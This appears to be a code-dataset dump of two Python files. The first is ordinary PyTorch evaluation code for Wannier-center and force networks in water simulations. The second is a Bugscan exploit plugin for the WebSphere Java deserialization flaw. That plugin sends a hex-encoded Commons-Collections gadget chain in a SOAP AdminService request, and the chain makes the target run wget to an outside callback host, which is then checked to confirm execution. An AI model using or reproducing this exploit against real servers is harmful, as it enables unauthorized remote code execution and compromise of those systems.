hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0ea441b9a5ea9b7ce8dfd0f75dcb8d92d735cd19
| 11,367
|
py
|
Python
|
train_test/test_networks.py
|
X4Science/SCFNN
|
5a9c68719e961ac958ea63a0d75e9f1f331578d7
|
[
"MIT"
] | 8
|
2021-09-28T08:57:12.000Z
|
2022-03-21T01:34:51.000Z
|
train_test/test_networks.py
|
andy90/SCFNN
|
5a9c68719e961ac958ea63a0d75e9f1f331578d7
|
[
"MIT"
] | null | null | null |
train_test/test_networks.py
|
andy90/SCFNN
|
5a9c68719e961ac958ea63a0d75e9f1f331578d7
|
[
"MIT"
] | 1
|
2022-03-27T09:43:00.000Z
|
2022-03-27T09:43:00.000Z
|
import numpy as np
from parameters import *
import torch
from torch import nn
import torch.optim as optim
from sklearn.decomposition import PCA
from useful_functions import *
def test_wannier_peturb(wannierxyz, features):
x = torch.tensor(np.transpose(features, axes=(2, 3, 1, 0)), dtype=torch.float)
y_0 = np.transpose(wannierxyz, axes=(3, 4, 0, 1, 2)).reshape(wannierxyz.shape[3], wannierxyz.shape[4],
wannierxyz.shape[0],
wannierxyz.shape[1] * wannierxyz.shape[2])
y = torch.tensor(y_0, dtype=torch.float)
class WCNet(nn.Module):
def __init__(self):
super(WCNet, self).__init__()
n_first = features.shape[0]
n_second = 12
self.linear_stack = nn.Sequential(
nn.Linear(n_first, n_second, bias=False), # setting the bias equal 0 can make sure the
)
def forward(self, x):
y = self.linear_stack(x)
return y
net = WCNet()
net.load_state_dict(torch.load("wannier_peturb.pth"))
y_pred_final = net(x)
y_pred_reshaped = backward_axis(uncompress_dims(y_pred_final.detach().numpy(), 3, 4))
return y_pred_reshaped
def test_wannier_GT(wannierxyz_GT, features):
x = torch.tensor(np.transpose(features, axes=(2, 1, 0)), dtype=torch.float)
y_1 = torch.tensor(compress_dims(np.transpose(wannierxyz_GT, axes=(3, 0, 1, 2)), 2), dtype=torch.float)
y_1_av = torch.tensor(np.loadtxt("wannier_GT_target_scale.txt"), dtype=torch.float) # the average for each xyz coordinate of the wannier center
y = (y_1 - y_1_av) # scale the xyz coordinate of the wannier center
class WCNet(nn.Module):
def __init__(self):
super(WCNet, self).__init__()
n_first = 36
n_second = 24
n_third = 16
n_forth = 12
self.linear_tanh_stack = nn.Sequential(
nn.Linear(n_first, n_second),
nn.Tanh(),
nn.Linear(n_second, n_third),
nn.Tanh(),
nn.Linear(n_third, n_forth),
)
def forward(self, x):
y = self.linear_tanh_stack(x)
return y
net = WCNet()
net.load_state_dict(torch.load("wannier_GT.pth"))
y_pred_final = net(x)
print(torch.mean(torch.abs(y - y_pred_final), axis=(0, 1))) # the average error for each xyz of the wannier center
for i in range(12):
print(torch.median(torch.abs(y - y_pred_final)[:, :, i]))
y_pred_descale = y_pred_final + y_1_av
wannierxyz_GT_predict = np.transpose(uncompress_dims(y_pred_descale.detach().numpy(), 2, 4), axes=(1, 2, 3, 0))
return wannierxyz_GT_predict
def test_force_peturb(fO, features, mol_type):
x = torch.tensor(np.transpose(features, axes=(2, 3, 1, 0)), dtype=torch.float)
y_0 = forward_axis(fO)
y = torch.tensor(y_0, dtype=torch.float)
class WCNet(nn.Module):
def __init__(self):
super(WCNet, self).__init__()
n_first = features.shape[0]
n_second = 3
self.linear_stack = nn.Sequential(
nn.Linear(n_first, n_second, bias=False), # setting the bias equal 0 can make sure the
)
def forward(self, x):
y = self.linear_stack(x)
return y
net = WCNet()
net.load_state_dict(torch.load("force_peturb_" + mol_type + ".pth"))
y_pred_final = net(x)
return backward_axis(y_pred_final.detach().numpy())
def test_force_GT(fO, fH):
xO = np.load("test_xO.npy")
xH = np.load("test_xH.npy")
xOO_d = np.load("test_xOO_d.npy")
xOH_d = np.load("test_xOH_d.npy")
xHO_d = np.load("test_xHO_d.npy")
xHH_d = np.load("test_xHH_d.npy")
xO = torch.tensor(xO, dtype=torch.float)
xH = torch.tensor(xH, dtype=torch.float)
xOO_d = torch.tensor(xOO_d, dtype=torch.float)
xOH_d = torch.tensor(xOH_d, dtype=torch.float)
xHO_d = torch.tensor(xHO_d, dtype=torch.float)
xHH_d = torch.tensor(xHH_d, dtype=torch.float)
fO = np.transpose(fO, axes=(2, 0, 1)) # move the config axis to the front
fH = np.transpose(fH, axes=(2, 0, 1))
yO = torch.tensor(fO, dtype=torch.float) / 0.05 # make the standard deviation of the forces to be about 1
yH = torch.tensor(fH, dtype=torch.float) / 0.05
class BPNet(nn.Module):
def __init__(self):
super(BPNet, self).__init__()
n_first_O = 30
n_second_O = 25
n_third_O = 25
self.w1_O = nn.Parameter(torch.randn((n_first_O, n_second_O))/5)
self.b1_O = nn.Parameter(torch.randn(n_second_O)/5)
self.w2_O = nn.Parameter(torch.randn((n_second_O, n_third_O))/5)
self.b2_O = nn.Parameter(torch.randn(n_third_O)/5)
self.w3_O = nn.Parameter(torch.randn((n_third_O, 1))/5)
self.b3_O = nn.Parameter(torch.randn(1)/5)
n_first_H = 27
n_second_H = 25
n_third_H = 25
self.w1_H = nn.Parameter(torch.randn((n_first_H, n_second_H)) / 5)
self.b1_H = nn.Parameter(torch.randn(n_second_H) / 5)
self.w2_H = nn.Parameter(torch.randn((n_second_H, n_third_H)) / 5)
self.b2_H = nn.Parameter(torch.randn(n_third_H) / 5)
self.w3_H = nn.Parameter(torch.randn((n_third_H, 1)) / 5)
self.b3_H = nn.Parameter(torch.randn(1) / 5)
def forward(self, x_O, x_H, dx_OO, dx_HO, dx_OH, dx_HH):
z1_O = torch.matmul(x_O, self.w1_O) + self.b1_O
z2_O = torch.matmul(torch.tanh(z1_O), self.w2_O) + self.b2_O
z1_H = torch.matmul(x_H, self.w1_H) + self.b1_H
z2_H = torch.matmul(torch.tanh(z1_H), self.w2_H) + self.b2_H
ap1_OO = torch.matmul(dx_OO, self.w1_O) / torch.cosh(z1_O) ** 2
ap2_OO = torch.matmul(ap1_OO, self.w2_O) / torch.cosh(z2_O) ** 2
y_OO = torch.matmul(ap2_OO, self.w3_O)
ap1_HO = torch.matmul(dx_HO, self.w1_O) / torch.cosh(z1_O) ** 2
ap2_HO = torch.matmul(ap1_HO, self.w2_O) / torch.cosh(z2_O) ** 2
y_HO = torch.matmul(ap2_HO, self.w3_O)
ap1_HH = torch.matmul(dx_HH, self.w1_H) / torch.cosh(z1_H) ** 2
ap2_HH = torch.matmul(ap1_HH, self.w2_H) / torch.cosh(z2_H) ** 2
y_HH = torch.matmul(ap2_HH, self.w3_H)
ap1_OH = torch.matmul(dx_OH, self.w1_H) / torch.cosh(z1_H) ** 2
ap2_OH = torch.matmul(ap1_OH, self.w2_H) / torch.cosh(z2_H) ** 2
y_OH = torch.matmul(ap2_OH, self.w3_H)
y_O = torch.sum(y_OO, axis=(-1, -2)) + torch.sum(y_OH, axis=(-1, -2))
y_H = torch.sum(y_HO, axis=(-1, -2)) + torch.sum(y_HH, axis=(-1, -2)) # this is like the change of total energy resulted by the change of H
return y_O, y_H
net = BPNet()
net.load_state_dict(torch.load("trained_force_model_statedict.pth"))
yO_pred_all = ()
yH_pred_all = ()
for i in range(xO.shape[0]):
yO_pred, yH_pred = net(xO[i], xH[i], xOO_d[i], xHO_d[i], xOH_d[i], xHH_d[i])
yO_pred_all += (yO_pred, )
yH_pred_all += (yH_pred, )
yO_pred_stack = torch.stack(yO_pred_all, -1).detach().numpy()
yH_pred_stack = torch.stack(yH_pred_all, -1).detach().numpy()
return yO_pred_stack, yH_pred_stack
def test_force_BP(fO, fH):
xO = np.load("test_xO.npy")
xH = np.load("test_xH.npy")
xOO_d = np.load("test_xOO_d.npy")
xOH_d = np.load("test_xOH_d.npy")
xHO_d = np.load("test_xHO_d.npy")
xHH_d = np.load("test_xHH_d.npy")
xO = torch.tensor(xO, dtype=torch.float)
xH = torch.tensor(xH, dtype=torch.float)
xOO_d = torch.tensor(xOO_d, dtype=torch.float)
xOH_d = torch.tensor(xOH_d, dtype=torch.float)
xHO_d = torch.tensor(xHO_d, dtype=torch.float)
xHH_d = torch.tensor(xHH_d, dtype=torch.float)
fO = np.transpose(fO, axes=(2, 0, 1)) # move the config axis to the front
fH = np.transpose(fH, axes=(2, 0, 1))
yO = torch.tensor(fO, dtype=torch.float) / 0.05 # make the standard deviation of the forces to be about 1
yH = torch.tensor(fH, dtype=torch.float) / 0.05
class BPNet(nn.Module):
def __init__(self):
super(BPNet, self).__init__()
n_first_O = 30
n_second_O = 25
n_third_O = 25
self.w1_O = nn.Parameter(torch.randn((n_first_O, n_second_O))/5)
self.b1_O = nn.Parameter(torch.randn(n_second_O)/5)
self.w2_O = nn.Parameter(torch.randn((n_second_O, n_third_O))/5)
self.b2_O = nn.Parameter(torch.randn(n_third_O)/5)
self.w3_O = nn.Parameter(torch.randn((n_third_O, 1))/5)
self.b3_O = nn.Parameter(torch.randn(1)/5)
n_first_H = 27
n_second_H = 25
n_third_H = 25
self.w1_H = nn.Parameter(torch.randn((n_first_H, n_second_H)) / 5)
self.b1_H = nn.Parameter(torch.randn(n_second_H) / 5)
self.w2_H = nn.Parameter(torch.randn((n_second_H, n_third_H)) / 5)
self.b2_H = nn.Parameter(torch.randn(n_third_H) / 5)
self.w3_H = nn.Parameter(torch.randn((n_third_H, 1)) / 5)
self.b3_H = nn.Parameter(torch.randn(1) / 5)
def forward(self, x_O, x_H, dx_OO, dx_HO, dx_OH, dx_HH):
z1_O = torch.matmul(x_O, self.w1_O) + self.b1_O
z2_O = torch.matmul(torch.tanh(z1_O), self.w2_O) + self.b2_O
z1_H = torch.matmul(x_H, self.w1_H) + self.b1_H
z2_H = torch.matmul(torch.tanh(z1_H), self.w2_H) + self.b2_H
ap1_OO = torch.matmul(dx_OO, self.w1_O) / torch.cosh(z1_O) ** 2
ap2_OO = torch.matmul(ap1_OO, self.w2_O) / torch.cosh(z2_O) ** 2
y_OO = torch.matmul(ap2_OO, self.w3_O)
ap1_HO = torch.matmul(dx_HO, self.w1_O) / torch.cosh(z1_O) ** 2
ap2_HO = torch.matmul(ap1_HO, self.w2_O) / torch.cosh(z2_O) ** 2
y_HO = torch.matmul(ap2_HO, self.w3_O)
ap1_HH = torch.matmul(dx_HH, self.w1_H) / torch.cosh(z1_H) ** 2
ap2_HH = torch.matmul(ap1_HH, self.w2_H) / torch.cosh(z2_H) ** 2
y_HH = torch.matmul(ap2_HH, self.w3_H)
ap1_OH = torch.matmul(dx_OH, self.w1_H) / torch.cosh(z1_H) ** 2
ap2_OH = torch.matmul(ap1_OH, self.w2_H) / torch.cosh(z2_H) ** 2
y_OH = torch.matmul(ap2_OH, self.w3_H)
y_O = torch.sum(y_OO, axis=(-1, -2)) + torch.sum(y_OH, axis=(-1, -2))
y_H = torch.sum(y_HO, axis=(-1, -2)) + torch.sum(y_HH, axis=(-1, -2)) # this is like the change of total energy resulted by the change of H
return y_O, y_H
net = BPNet()
net.load_state_dict(torch.load("trained_force_model_statedict_BP.pth"))
yO_pred_all = ()
yH_pred_all = ()
for i in range(xO.shape[0]):
yO_pred, yH_pred = net(xO[i], xH[i], xOO_d[i], xHO_d[i], xOH_d[i], xHH_d[i])
yO_pred_all += (yO_pred, )
yH_pred_all += (yH_pred, )
yO_pred_stack = torch.stack(yO_pred_all, -1).detach().numpy()
yH_pred_stack = torch.stack(yH_pred_all, -1).detach().numpy()
net_traced = torch.jit.trace(net, (xO[0], xH[0], xOO_d[0], xHO_d[0], xOH_d[0], xHH_d[0]))
return yO_pred_stack, yH_pred_stack
| 39.46875
| 152
| 0.597255
| 1,892
| 11,367
| 3.319767
| 0.088795
| 0.056042
| 0.061137
| 0.080242
| 0.842223
| 0.827894
| 0.800987
| 0.787932
| 0.787932
| 0.773603
| 0
| 0.037321
| 0.264538
| 11,367
| 287
| 153
| 39.606272
| 0.713995
| 0.049177
| 0
| 0.775229
| 0
| 0
| 0.027883
| 0.008893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068807
| false
| 0
| 0.03211
| 0
| 0.169725
| 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eb83eb66204066ae4fe70459c8fc3d70e694187
| 7,920
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-1664.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-1664.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-1664.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = java unserialize websphere rce
#___From___ = http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
import random
import base64
def assign(service, arg):
if service == 'websphere':
return True, arg
def audit(arg):
flag = ""
for i in range(16):
flag += chr(ord('a')+random.randint(0,25))
target = arg
p = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x54\x77\x67\x65\x74\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x79\x73\x61\x6e\x64\x62\x6f\x78\x2e\x73\x69\x6e\x61\x61\x70\x70\x2e\x63\x6f\x6d\x2f\x6b\x76\x3f\x61\x63\x74\x3d\x73\x65\x74\x26\x6b\x3d\x6a\x61\x76\x61\x75\x6e\x6a\x62\x6f\x73\x73\x61\x30\x62\x39\x32\x33\x38\x32\x30\x64\x63\x63\x35\x30\x39\x61\x26\x76\x3d\x6a\x61\x76\x61\x75\x6e\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
p = p.replace("a0b923820dcc509a",flag)
b64 = base64.b64encode(p)
raw = """
POST / HTTP/1.0
Host: 127.0.0.1:8880
Content-Type: text/xml; charset=utf-8
Content-Length: 2646
SOAPAction: "urn:AdminService"
<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">
<LoginMethod>BasicAuth</LoginMethod>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">%s</objectname>
<attribute xsi:type="xsd:string">ringBufferSize</attribute>
</ns1:getAttribute>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""" % b64
code, head, body, errcode, final_url = curl.curl2(target,raw=raw)
check = "https://pysandbox.sinaapp.com/kv?act=get&k=javaunjbossa0b923820dcc509a".replace("a0b923820dcc509a",flag)
code, head, body, errcode, final_url = curl.curl2(check)
if 'javaun' in body and not 'None' in body:
security_hole(target + ' has java unserialize rce.')
